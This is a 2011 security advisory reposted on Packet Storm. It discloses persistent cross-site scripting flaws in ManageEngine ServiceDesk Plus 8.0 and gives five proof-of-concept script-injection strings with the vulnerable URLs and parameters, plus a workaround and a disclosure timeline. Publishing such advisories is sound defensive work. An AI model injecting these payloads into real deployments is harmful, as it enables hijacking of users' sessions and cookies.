ManageEngine ServiceDesk Plus 8.0 Cross Site Scripting

2011-07-29T00:00:00
ID PACKETSTORM:103540
Type packetstorm
Reporter Narendra Shinde
Modified 2011-07-29T00:00:00

Description

                                        
                                            `  
=======================================================================  
Secur-I Research Group Security Advisory [ SV-2011-003]  
=======================================================================  
Title: ManageEngine ServiceDesk Plus 8.0 Build 8013 Multiple Persistence Cross Site Scripting Vulnerabilities  
Product: ServiceDesk Plus  
Vulnerable version: 8.0 Build 8013 (Other versions could also be affected)  
Fixed version: N/A  
Impact: Medium  
Homepage: http://www.manageengine.com/  
Vulnerability ID: SV-2011-003  
Found: 2011-07-08  
By: Narendra Shinde  
Secur-I Research Group  
http://securview.com/  
=======================================================================  
  
  
Vendor description:  
-------------------  
ServiceDesk Plus integrates your help desk requests and assets to help you manage your IT effectively. It helps you implement ITIL best practices and troubleshoot IT service requests faster. ServiceDesk Plus is highly customizable, easy-to-implement help desk software. More than 10,000 IT managers worldwide use ServiceDesk Plus to manage their IT help desk and assets.ServiceDesk Plus is available in 23 different languages.  
  
Source: http://www.manageengine.com/products/service-desk/  
  
  
Vulnerability Information:  
-------------------------  
Class: Improper Neutralization of Input during Web Page Generation  
('Cross-site Scripting') [CWE-79]  
Impact: Insertion and Execution of malicious scripts in user browser  
Remotely Exploitable: Yes  
Authentication Required: Yes  
User interaction Required : Yes  
  
  
  
Vulnerability overview/description:  
-----------------------------------  
ServiceDesk Plus version 8.0 Build 8013 is prone to multiple persistent cross-site scripting vulnerabilities as the user-supplied input received via certain parameters is not properly sanitized.  
  
This can be exploited by submitting specially crafted input to the affected software. Successful exploitation could allow the attacker to execute arbitrary script code within the user's browser session in the security context of the targeted site. The attacker could gain access to user's cookies (including authentication cookies), if any, associated with the targeted site, access recently submitted data by the target user via web forms, or take actions on the site masquerading as the target user.  
  
  
  
Proof-of-Concept(PoC):  
  
a)  
URL: http://vulnerableserver/SetUpWizard.do?forwardTo=technician&fromModule=QuickAction  
Action: Configuration wizard – Add New Technician  
Vulnerable Parameter: Name  
Test string used: “><script>alert(“SecurView”)</scrip  
  
b)  
URL: http://vulnerableserver/SiteDef.do  
Action: Add a new site  
Vulnerable Parameter: Site name  
Test string used: “><script>alert(“SecurView”)</script>  
  
c)  
URL: http://vulnerableserver/GroupResourcesDef.do  
Action: Create Group  
Vulnerable Parameter: Group Name  
Test string used: “><script>alert(“SecurView”)</script>  
  
d)  
URL: http://vulnerableserver/LicenseAgreement.do?operation=newagreement  
Action: Add new license agreement  
Vulnerable Parameter: Agreement Number  
Test string used: “><script>alert(“SecurView”)</script>  
  
e)  
URL: http://vulnerableserver/ManualNodeAddition.do?isServer=true  
Action: Server Configuration – Computer  
Vunlerable parameter: Name  
Test string used: “><script>alert(“Securview”)</script>  
  
  
  
  
Workaround:  
-----------  
Proper user input filtering. For more details please refer:  
https://www.owasp.org/index.php/XSS_%28Cross_Site_Scripting%29_Prevention_Cheat_Sheet  
  
Timeline:  
---------  
Vulnerability Found : 14/7/2011  
Reported to Vendor : 14/7/2011  
Confirmation from vendor : 19/7/2011  
Public Disclosure : 29/7/2011  
  
  
Thanks & Regards,  
Narendra.  
  
Confidentiality: This e-mail and any attachments may be confidential and may also be privileged. If you are not an intended named recipient, please notify the sender immediately and do not disclose the contents to another person use it for any purpose, or store or copy the information in any medium.  
`